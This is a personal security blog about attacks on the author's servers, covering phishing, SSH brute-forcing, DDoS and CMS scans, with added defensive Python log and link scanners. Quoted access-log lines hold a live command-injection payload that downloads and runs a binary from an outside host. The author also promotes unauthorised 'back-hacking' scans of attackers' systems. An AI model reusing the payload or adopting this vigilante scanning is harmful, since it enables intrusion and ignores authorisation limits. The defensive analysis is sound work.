Back-Hacker Blog

The Back-Hacking Blog came into existence around December 2011 after I started using Kali Linux. It comes from the idea of defending against hackers in a manner similar to Krav Maga. The putative system or security administrator doesn't just sit there passively receiving attacks; rather, in the background they start probing the intruder's system, looking for weaknesses and exploits and using all of the tools available. However, make sure you read that first Back-Hacking link (and this one). There are legal, ethical and logistical questions to be addressed. Sometimes it is quite effective, as related in SunTrust Spoof: Additional ways of protecting your SunTrust access. The other side of the coin is that it is not for the uninitiated. You may compromise your systems, open yourself or your organization to legal liability or criminal prosecution depending on your jurisdiction, and/or straight up waste your time. My personal position is that it is like carrying a concealed weapon, to be used only justifiably in self-defense.

AlReaud Sun, 11/13/2016 - 14:17

Very Quiet on the Server Front

NOTE: Updated 11/15/2016

Unusually so, actually. Some of the methods may be working. Attack vectors cycle through periodically, some brute forcing the root, some brute forcing non-existent accounts. I still haven't figured out how to trap the password strings coming in on the brute forcing. The majority of attacks last week came from CN, then US.

The activity has changed to the on-line servers, where I occasionally get DOS attacks. The GoDaddy servers throttle down if they sense one going on, but sometimes mistake valid activity for a DOS attack. All that takes latency to a 3-7 second level, which is OK as long as it stays on the lower end.

A new tool that I'm learning is Metasploit. An excellent penetration testing tool, but with a fairly steep learning curve. Maybe one of these days I'll make enough money to buy the pro version…

AlReaud Tue, 01/10/2012 - 22:21

Dissecting a Spoof Craigs List Email

NOTE: Updated 11/15/2016

Today's blog entry will cover a little live action. This is a continuation of the attacks from French domains. Contrary to popular belief, all online attacks DO NOT ORIGINATE FROM CHINA!

Following the receipt of the below email, I examined the email in detail (clicking on the image opens a full size image in another tab or window).

Craigs List phishing email attempting to get your login.

The most important point above is that when you hover over the link, you can see in the status bar that it does not send you to the link displayed, but to a bogus link. Thunderbird picks up on this and flags the message as a possible scam message.

The IP address of this link is 94.23.22.118, and is a Plesk virtual machine on a cloud node. Attacks from that area have been ongoing for weeks... Zenmap indicates that it has the signature of a compromised machine, including all common mail ports open, such as Postfix smtpd, Courier pop3d, Courier imapd, with three distinct security certificates for three different organizations. Zenmap gives that bomb symbol, LOL! The Zenmap scan is long duration and stealthy to prevent the quarry from bolting, just like if you were tracking a deer.

Following through the link takes you to [http://]accounts.craigslist.org.user.login.qpef.craigslist-auth.info, which is a sub-domain of the same offending domain. What's interesting is the slick social engineering tool they use. It's in plain view, but they sucker you into accepting it (clicking on the image opens a full size image in another tab or window).

Craigs List account login phishing scam example.

First off, we see plainly that the WARNING tells one what to look for. So if one just looks at the address bar, one can see that it DOESN'T match the one in the warning. Paying attention will save your ass. Two scripts are indicated as being blocked. Those are the ones that they "borrow" from the actual true site. Another indication is that the site is not locked. There is no lock symbol or other indication that it is a secure (https) site. Again, reading the warning will ensure that this scam doesn't work for you.

The body is pretty slick also, almost copying verbatim the actual site, and one actually does post to login.php; however, not to https://accounts.craigslist.org/login.

Firebug analysis of Craigs List phishing site code

Giving it bogus information sends one to http://www.craigslist.org/about/help/user_accounts, making one think that it was a glitch at the server.
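The hover check described above (displayed link text naming one site while the href goes to another, and an https-looking label sitting over a plain http link) can be automated over a message body. The following is an added example, not code from the original post: it parses the HTML of a constructed sample message with Python's standard library and reports anchors whose visible domain and actual target disagree. The sample message, the helper names and the crude "last two labels" domain comparison are all assumptions of this example.

```python
"""Flag links in an HTML email whose visible text names a different site
than the href actually points to (the tell described in the post).

Added example; not code from the original blog. Standard library only,
run against a constructed sample message."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling the phishing mail discussed in the post:
# the first anchor shows the real craigslist login URL but points at the
# look-alike domain named in the post; the second is an honest link.
SAMPLE_EMAIL_HTML = """
<p>Please verify your account at
<a href="http://accounts.craigslist.org.user.login.qpef.craigslist-auth.info/login.php">https://accounts.craigslist.org/login</a>
or read our <a href="https://www.craigslist.org/about/help/user_accounts">help page</a>.</p>
"""

# Pull a hostname out of link text that looks like a URL or bare domain.
HOST_RE = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.I)


def registrable(host):
    """Crude 'last two labels' approximation of the registrable domain.
    Good enough for .org/.info/.com; a real checker would consult the
    Public Suffix List so that e.g. example.co.uk is handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def find_deceptive_links(html):
    """Return findings for anchors whose displayed text and target disagree."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = urlparse(href)
        shown = HOST_RE.search(text)
        if not shown or not target.hostname:
            continue  # text is not URL-like ("help page"); nothing to compare
        shown_host = shown.group(1)
        reasons = []
        if registrable(shown_host) != registrable(target.hostname):
            reasons.append("domain mismatch: shows %s, goes to %s"
                           % (shown_host, target.hostname))
        if text.lower().startswith("https://") and target.scheme != "https":
            reasons.append("shows https but link is %s" % target.scheme)
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(f["text"], "->", f["href"])
        for r in f["reasons"]:
            print("   ", r)
```

The same two checks are what a mail client's scam heuristic does; the domain comparison is deliberately simple here, so on real mail expect a few false positives from tracking redirectors and treat a hit as a prompt to look, not as proof.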

Shutting down this kind of site externally is hard. Because it relies on the cloud, it has a lot of power, and is therefore not subject to methods such as siege. However, there are significant weaknesses, as related by previous OpenVAS scans of the same IP area. We've previously scanned 94.23.205.180, a CMS attacker IP, and found 16 high level security issues. On this domain, OpenVAS reports seven high and five medium level weaknesses. One allows access to be gained to random user accounts. No wonder phishing mail is coming from this address!

As the sysops in that domain block (94.23.0.0/16) apparently can't or won't shut down those compromised virtual machines, I put these out. As the economy has gotten worse and individuals are becoming desperate for work, these kinds of scams keep popping up more and more.

AlReaud Tue, 12/27/2011 - 09:29

Punishment DDOS attacks on online server

NOTE: Updated 11/15/2016

Attacks have ceased pretty much on the testing server, but I must have pissed somebody off last night. WOOT!

DDOS attacks started in the late evening, starting probably around 21:00 through at least probably midnight. Can't actually tell because I can't access the httpd logs. The positive note is this led to me asking GoDaddy where the httpd logs are, something I wasn't aware of (in FTP Manager). Bluehost allows access to the server logs, but Yahoo did not when I used them. It's a virtual machine so the logs don't compromise any hosting provider confidential data...

The offending IP addresses were:

  • 91.121.170.124 - FR, I know the bot-net there, and they have been getting inverse “Pavlovian Dog” training. I am almost willing to bet the control node resides in this general IP area, for at least one worldwide bot-net. Some of the addresses they control are:
    • 77.68.38.175 - UK
    • 121.254.168.13 - KR
    • 202.43.99.159 - JP

The attack vector is overloading the CMS requesting non-existent tiny_mce. Script-kiddie shit, LOL.

I'm beginning to think I need my own bot-net, based on the idea of the Seawolf class submarines…

AlReaud Sat, 12/24/2011 - 08:16

Rise of the Machine. A week of wetware against bots...

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL.

One of the most interesting, attack wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses, and proxy service is turned off. Drupal is also very well protected, BTW. Your rewards for going there are 403's and backtracking… So that's one of the new vectors.
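Both request patterns described on this blog, the phpThumb query strings carrying shell commands in this post and the repeated requests for a non-existent tiny_mce path in the "Punishment DDOS attacks on online server" post, are visible in the httpd access log. As an added example (not the blog's own tooling), this Python script parses combined-format log lines, URL-decodes the query string so the command text is readable, and flags lines containing a shell command separator followed by a command name, as well as any IP that hits the same missing path repeatedly. The two phpThumb lines are the ones quoted above; the remaining lines and the RFC 5737 test addresses are constructed for the example, and the regexes and thresholds are this example's assumptions.

```python
"""Scan Apache/httpd access-log lines for two patterns discussed on the blog:
shell commands smuggled into a query string (the phpThumb requests) and an
IP hammering the same non-existent path (the tiny_mce 404 flood).

Added example, not the blog's own tooling; standard library only."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache combined/common log format:
#   ip ident user [time] "method path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell pipeline separators followed by a command name, or a /tmp/ drop path;
# neither has any business in an image-resizer query string.
SHELL_RE = re.compile(
    r"(?:;|\|\||&&|\$\()\s*(?:ls|wget|curl|chmod|sh|bash|ps|rm|nc|perl|python)\b|/tmp/"
)

# The first two lines are the ones quoted in the post; the rest are
# constructed, using RFC 5737 test addresses.
SAMPLE_LOG = r"""
161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602
161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168
192.0.2.10 - - [23/Dec/2011:21:04:01 -0700] "GET /index.php?q=node/3 HTTP/1.1" 200 8120
192.0.2.55 - - [23/Dec/2011:21:05:11 -0700] "GET /admin/tiny_mce/tiny_mce.js HTTP/1.1" 404 512
192.0.2.55 - - [23/Dec/2011:21:05:11 -0700] "GET /admin/tiny_mce/tiny_mce.js HTTP/1.1" 404 512
192.0.2.55 - - [23/Dec/2011:21:05:12 -0700] "GET /admin/tiny_mce/tiny_mce.js HTTP/1.1" 404 512
"""


def parse_line(line):
    """Split one access-log line into a dict; returns None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    path, _, query = rec["url"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)  # %20 -> space, so the command text is readable
    return rec


def find_injection_attempts(log_text):
    """Return (ip, path, decoded query) for requests carrying shell commands."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec and SHELL_RE.search(rec["query"]):
            hits.append((rec["ip"], rec["path"], rec["query"]))
    return hits


def find_404_floods(log_text, threshold=3):
    """Return {(ip, path): count} for IPs hitting the same missing path >= threshold times."""
    counts = Counter()
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            counts[(rec["ip"], rec["path"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, path, query in find_injection_attempts(SAMPLE_LOG):
        print("command injection attempt from", ip, "against", path)
        print("   decoded query:", query)
    for (ip, path), n in find_404_floods(SAMPLE_LOG).items():
        print("%s requested missing %s %d times" % (ip, path, n))
```

Decoding before matching matters: the separators in the quoted lines are percent-encoded, so a pattern applied to the raw line would have to anticipate every encoding variant. The 404 counter uses the request path only, which is enough for a flood against one fixed file; a real deployment would count per time window rather than per file.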

The other interesting proposition was getting these from two countries going in opposite directions. Tracerouting to 161.139.195.191 actually terminates at 161.139.144.4, but now terminates at:
$ traceroute 161.139.195.191
18  ge-0-0-0.glsfb02.ipe.time.net.my (211.25.27.42)

When this was scanned with zenmap, observe where traceroute terminates (click on image to get full resolution version).

Reduced size zenmap of attacker IP.

It's one of the strangest maps I have had the displeasure to view. Again, this week was a virtual tour of the world, LOL! Contacted a hospital in China, because I don't want to be disabling hospital systems because of compromised security at their end.

Common patterns:

  • HTTP TRACE enabled.
  • All or almost all mail ports open (POP, IMAP, etc.)
  • Undefined ports open.
  • Many mail servers with nothing but a control panel login.
  • Most importantly: Almost 100% LINUX SYSTEMS. This is concerning because it means, IMHO, that the configuration has become too complex for most users to securely configure. The 'nix systems can be the most secure when open to the Internet, but if I'm finding this datum, that means that most compromised systems have been mis-configured allowing bot intrusion.

I have the zenmaps, and redacted secure and httpd logs available for research purposes if anybody is interested. Just contact me at alreaud@happycattech.com.

AlReaud Fri, 12/23/2011 - 10:12

Persistent attacks from one IP in India

NOTE: Updated 11/15/2016

Today's memorable entry is from Trivandrum, Kerala, India, in the State of Delhi: 117.243.250.249

They are memorable because for some reason fail2ban didn't trap them. So they got to attack the shell 495 times instead of the nominal five. Zenmap indicates an unusual setup, with some open ports that are normally filtered, and things not normally seen, such as ipp, wpgs, route, and sip. An unknown port is open at 20717.

OpenVAS reports 14 low level weaknesses, with a server running at port 631. The interpretation of that is that the hacking is intentional, because without a weakness present, it somewhat eliminates unintentional bots, as with the Church last week. Most of the systems examined so far have certain weaknesses present, such as http TRACE. This IP is clean of even moderate weaknesses.

Makes one wonder why they waste their time. The password on the shell is not going to be weak enough to be hack-able from the Internet, do you think?

Three sample attacks:
Dec 12 05:47:xx HCTSERVER unix_chkpwd[6306]: password check failed for user (root)
Dec 12 05:47:xx HCTSERVER sshd[6304]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.243.250.249  user=root
Dec 12 05:47:xx HCTSERVER sshd[6304]: Failed password for root from 117.243.250.249 port 18596 ssh2
Dec 12 12:47:xx HCTSERVER sshd[6305]: Received disconnect from 117.243.250.249: 11: Bye Bye
Dec 12 05:47:xx HCTSERVER unix_chkpwd[6311]: password check failed for user (root)
Dec 12 05:47:xx HCTSERVER sshd[6309]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.243.250.249  user=root
Dec 12 05:47:xx HCTSERVER sshd[6309]: Failed password for root from 117.243.250.249 port 21460 ssh2
Dec 12 12:47:xx HCTSERVER sshd[6310]: Received disconnect from 117.243.250.249: 11: Bye Bye
Dec 12 05:47:xx HCTSERVER unix_chkpwd[6314]: password check failed for user (root)
Dec 12 05:47:xx HCTSERVER sshd[6312]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.243.250.249  user=root
Dec 12 05:47:xx HCTSERVER sshd[6312]: Failed password for root from 117.243.250.249 port 23847 ssh2
Dec 12 12:47:xx HCTSERVER sshd[6313]: Received disconnect from 117.243.250.249: 11: Bye Bye

The offending IP is owned by:
route:               117.243.240.0/20
descr:               BSNL Internet
country:            IN
origin:               AS9829
mnt-lower:       MAINT-IN-DOT
mnt-routes:      MAINT-IN-DOT
mnt-by:            MAINT-IN-AS9829
changed:          dnw_jtotech@bsnl.in 20070914

role:              NS Cell
address:        Internet Cell
address:        Bharat Sanchar Nigam Limited address: 8th Floor,148-B Statesman House
address:        Barakhamba Road, New Delhi - 110 001
country:        IN
phone:          +91-11-23734057
phone:          +91-11-23710183
fax-no:          +91-11-23734052
e-mail:           hostmaster@sancharnet.in
e-mail:           abuse@bsnl.in
admin-c:        CGMD1-AP
tech-c:           DT197-AP
nic-hdl:          NC83-AP
mnt-by:         MAINT-IN-DOT
changed:       dnwplg@sancharnet.in 20030120
changed:       hm-changed@apnic.net 20071227

 

AlReaud Mon, 12/12/2011 - 08:10

Sea Change in Attack Vectors

NOTE: Updated 11/15/2016

There's been a sea change in the attack vectors coming into the testing server, and some interesting characters.

For approximately two weeks, we've been subject to "IP Agile" attacks. The term "IP Agile" is something borrowed from a piece of high end R&D lab equipment, a Fluke frequency-agile signal generator. The "IP Agile" attackers use numerous IP addresses that repeat only occasionally over a span of hours, evading tools like fail2ban. There also seems to be a specific cycle through countries, China, Brazil, Japan, EU (UK or France), Taiwan, then repeating, though I don't yet have enough data.

This set of attackers seems to be hitting mail servers and phone branch exchange (PBX) servers mostly. Found a great site at a church in Lafayette, IN that had their website infested. The trick was that you only saw the spam if you had JavaScript disabled. Called them up and spoke to a parishioner manning the phones, and followed up with an email.

That attack vector seems to have gone back to the normal one, which is fast hitting the secure shell hoping to evade log analysis applications. The hit rate averages 3 seconds per, and they get five tries.
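The shell brute-force pattern in this post (about three seconds per attempt, five tries before fail2ban acts) and the 495 untrapped attempts from a single IP in the "Persistent attacks from one IP in India" post are both counting exercises over the sshd log; the "IP Agile" rotation described above defeats per-host counting because no single address reaches the limit. As an added example, not the blog's fail2ban setup, the Python below parses "Failed password" lines, applies a sliding-window per-host limit of five, and then rolls the same events up to /16 blocks so a rotating attacker inside one network range still stands out. The log lines and addresses are constructed (RFC 5737 test ranges), and the window sizes and the per-block limit are assumptions of this example.

```python
"""Count sshd 'Failed password' events per source host inside a sliding
window (what fail2ban does, with the blog's limit of five tries) and,
because rotating-IP attackers keep every single host under that limit,
also roll the counts up to the /16 block each address belongs to.

Added example, not the blog's fail2ban configuration; standard library only."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_network

# syslog timestamp, host, sshd[pid]: Failed password for [invalid user] NAME from IP port N
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample (RFC 5737 test addresses): one host hammering root every
# three seconds, and four different hosts in one /16 that each try only once.
SAMPLE_AUTH_LOG = """\
Dec 12 05:47:01 HCTSERVER sshd[6304]: Failed password for root from 192.0.2.7 port 18596 ssh2
Dec 12 05:47:04 HCTSERVER sshd[6309]: Failed password for root from 192.0.2.7 port 21460 ssh2
Dec 12 05:47:07 HCTSERVER sshd[6312]: Failed password for root from 192.0.2.7 port 23847 ssh2
Dec 12 05:47:10 HCTSERVER sshd[6315]: Failed password for root from 192.0.2.7 port 25011 ssh2
Dec 12 05:47:13 HCTSERVER sshd[6318]: Failed password for root from 192.0.2.7 port 26102 ssh2
Dec 12 05:52:30 HCTSERVER sshd[6401]: Failed password for invalid user oracle from 198.51.100.12 port 40211 ssh2
Dec 12 05:58:02 HCTSERVER sshd[6410]: Failed password for invalid user admin from 198.51.100.77 port 40212 ssh2
Dec 12 06:03:44 HCTSERVER sshd[6422]: Failed password for root from 198.51.100.130 port 40213 ssh2
Dec 12 06:09:15 HCTSERVER sshd[6431]: Failed password for root from 198.51.100.201 port 40214 ssh2
Dec 12 06:10:00 HCTSERVER sshd[6440]: Received disconnect from 198.51.100.201: 11: Bye Bye
"""


def parse_failures(log_text, year=2011):
    """Return [(timestamp, user, ip)] for failed-password lines; other lines are skipped.
    syslog lines carry no year, so the caller supplies one."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            events.append((ts, m.group("user"), m.group("ip")))
    return events


def hosts_over_limit(events, limit=5, window=timedelta(minutes=10)):
    """{ip: time the limit was first reached} for hosts with >= limit failures
    inside any sliding window (fail2ban style)."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, _user, ip in sorted(events):
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:  # drop attempts older than the window
            q.popleft()
        if len(q) >= limit and ip not in flagged:
            flagged[ip] = ts
    return flagged


def blocks_over_limit(events, prefix=16, limit=3, window=timedelta(hours=1)):
    """Same idea rolled up to /prefix blocks, to surface rotating-IP attackers:
    {block: sorted distinct source IPs seen in the window once the limit is hit}."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, _user, ip in sorted(events):
        block = str(ip_network("%s/%d" % (ip, prefix), strict=False))
        q = recent[block]
        q.append((ts, ip))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) >= limit:
            flagged[block] = sorted({src for _t, src in q})
    return flagged


if __name__ == "__main__":
    ev = parse_failures(SAMPLE_AUTH_LOG)
    for ip, when in hosts_over_limit(ev).items():
        print("host limit reached by %s at %s" % (ip, when.time()))
    for block, sources in blocks_over_limit(ev).items():
        print("block %s: %d failures from %s" % (block, len(sources), ", ".join(sources)))
```

A /16 is a coarse key (it can cover a whole ISP), so the block roll-up is a hint for looking at the traffic and the whois record, not a ban criterion on its own; a /24 or the origin AS from the route object, as quoted for the Indian address, is usually a better grouping when that data is available.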

One of the interesting characters from yesterday was from an IP address identified as belonging to the US DOD. Please don't tell me that attack bots are running out of DOD computers somewhere. I'm not too worried though, as I did participate in that Shredder Challenge and commented on it. But I didn't back-hack too far there, just in case…

Today's resolved hackers (ssh or awstats):

  • cp.trixbox.com
  • 200.169.74.156
  • www.dol-in.org/ (contacted these guys, they fixed it within the hour).
  • www.arcuspro.fr
  • dsn2.pavianetwork.com (85.88.195.35)
AlReaud Thu, 12/08/2011 - 12:29